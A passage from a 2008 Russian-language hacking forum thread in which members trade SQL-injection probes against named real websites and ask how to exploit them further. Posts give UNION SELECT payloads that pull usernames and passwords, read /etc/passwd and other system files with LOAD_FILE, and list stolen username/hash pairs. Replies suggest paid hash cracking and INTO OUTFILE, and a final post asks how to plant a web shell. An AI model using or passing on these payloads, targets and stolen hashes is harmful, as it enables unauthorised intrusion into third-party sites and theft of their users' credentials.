Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    Это не ошибка MSSQL, это VB. :)
     
    #2441 z3r0cool, 24 Jun 2008
    Last edited: 24 Jun 2008
  2. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Значит, что либо сделать невозможно.
    http://www.goteborg.com/default.aspx?id=-1' - Здесь аналогично?
     
  3. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    Да, вообще там используется System.Number.ParseInt32.
     
  4. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Мде... чёт я не подумал).Всё равно попробую)
     
  5. Мистерео

    Мистерео Elder - Старейшина

    Joined:
    7 Aug 2006
    Messages:
    33
    Likes Received:
    32
    Reputations:
    1
    Вот у меня несколько вопросов
    Нашел сайт нашел все таблицы+ колонки вопрос как прочитать колонки в таблице если я делаю запрос типу
    Code:
    http://www.expressionindesign.com/post.php?id=29'+union+select+1,2,3,id,username,password,7,8,9,10,11,12,13,14+FROM+Users+LIMIT+1,1/*
    В таблице Users имеются следующие колонки
    Code:
    Users
    --id,username,password,email
    
    Возможно я чтото делаю не так или нужно шифровать? (пробовал в HEX шифровать кое где и не получилось)
    в придачу даю список всех таблиц
    Code:
    CHARACTER_SETS
    COLLATIONS
    COLLATION_CHARACTER_SET_APPLICABILITY
    COLUMNS
    COLUMN_PRIVILEGES
    KEY_COLUMN_USAGE
    ROUTINES
    SCHEMATA
    SCHEMA_PRIVILEGES
    STATISTICS
    TABLES
    TABLE_CONSTRAINTS
    TABLE_PRIVILEGES
    TRIGGERS
    USER_PRIVILEGES
    VIEWS
    Blog
    Cats
    Comment
    My_places
    Portfolio
    Snippet
    Snippet_cat
    Snippet_language
    Tags
    Testimonials
    Top_cat
    Top_rated
    User
    Users
     
  6. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    лови .. и думай ..
     
    1 person likes this.
  7. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    http://www.pemshop.com/detail.aspx?ID=1%20or%201=(select%20system_user)-- - с этим можно что нибудь сделать?
    Аналогичный прошлый вопрос.
     
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Ershik
    Только расскрытие пути
     
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://mini-abo.eu/index.php?m=price&sstring=-1'&go=%CF%EE%E8%F1%EA


    скуля...какие предложения по раскрутке?
     
  10. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    К какому виду относится эта ошибка?
    http://www.ncbi.ie/ncbi/shop/show_cart.php?new=74%27&save=747'
     
    1 person likes this.
  11. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    Никак видимо, проверка длины параметра sstring, максимальная длина = 12 символов : хотя и пропускает = (', /**/, спец символы);
     
  12. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    http://ru2.php.net/manual/en/function.array-count-values.php
     
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    z3r0cool ошибка появляется не только в этом параметре....
    на пример введи в поле поиска кавычку
     
  14. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Gorev
    Поиск это и есть параметр sstring
    Запрос у тебя вываливается на страницу посмотри внимательно ,и всё сам увидишь
    Попробуй ввести 10 символов(любых) и ковычку ошибки не будет, а 9 символов и ковычка- ошибка То-есть обрезается запрос после 10 символов + 2 знака %
    LIKE '%твои_10_символов%'
     
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    jokester spasibo... znachit ne sud'ba
     
  16. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Люди!!! Что делать?
    Вот получил 80 kb хлама по запросам:
    ?news_id=9999+union+select+1,2,3,4,5,6,7/*
    ?news_id=9999+union+select+1,2,3,DATABASE(),5,6,7/*
    ?news_id=9999+union+select+1,2,3,USER(),5,6,7/*
    ?news_id=9999+union+select+1,2,3,VERSION(),5,6,7/*
    ?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/passwd'),5,6,7/*
    ?news_id=9999+union+select+1,2,3,concat_ws(0x2F,us er,password),5,6,7+from+mysql.user/*
    ?news_id=9999+union+select+1,2,3,concat_ws(0x3a,ve rsion(),database(),user()),5,6,7+from+mysql.user/*
    ?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/syslog.conf'),5,6,7/*
    ?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/ftpusers'),5,6,7/*
    ?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/proftpd.conf'),5,6,7/*
    ?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/hosts'),5,6,7/*
    ?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/services'),5,6,7/*
    ?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/group'),5,6,7/*
    ?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/profile'),5,6,7/*
    ?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/bashrc'),5,6,7/*

    Самое ценное это

    horde/7ec6cb6253573035
    pma_0m8q29w9ure8/042d59146e94d7b2
    admin/54e0c6945fa5e34c
    u15364/6cb1963d2018c3ea

    А что теперь делать то? Hash расшифровать неполучается.
    Нужен дамп базы данных! HELP ME
     
  17. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Хеши Mysql попробуй попросить сбрутить из за платно.
     
  18. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Уже раз 10 просил - пока ничего :(
    http://hashcracking.info - нет результата :(
    PasswordRpo - кислота :(
    HELP ME :confused:
     
    #2458 mff, 26 Jun 2008
    Last edited: 26 Jun 2008
  19. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    INTO OUTFILE вроде никто не отменял? :)
    Кидай если что линк в личку, посмотрим.
     
    1 person likes this.
  20. sedoy_xxx

    sedoy_xxx Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    244
    Likes Received:
    41
    Reputations:
    -1
    могу менять html код страницы, знаю полный путь до папки, как залить шелл? а именно стянуть с удаленного сервака файл в эту папку?
    Конструкции типа <? php system("ls") ?> не выполняются. js работает
     
    #2460 sedoy_xxx, 26 Jun 2008
    Last edited: 26 Jun 2008
Thread Status:
Not open for further replies.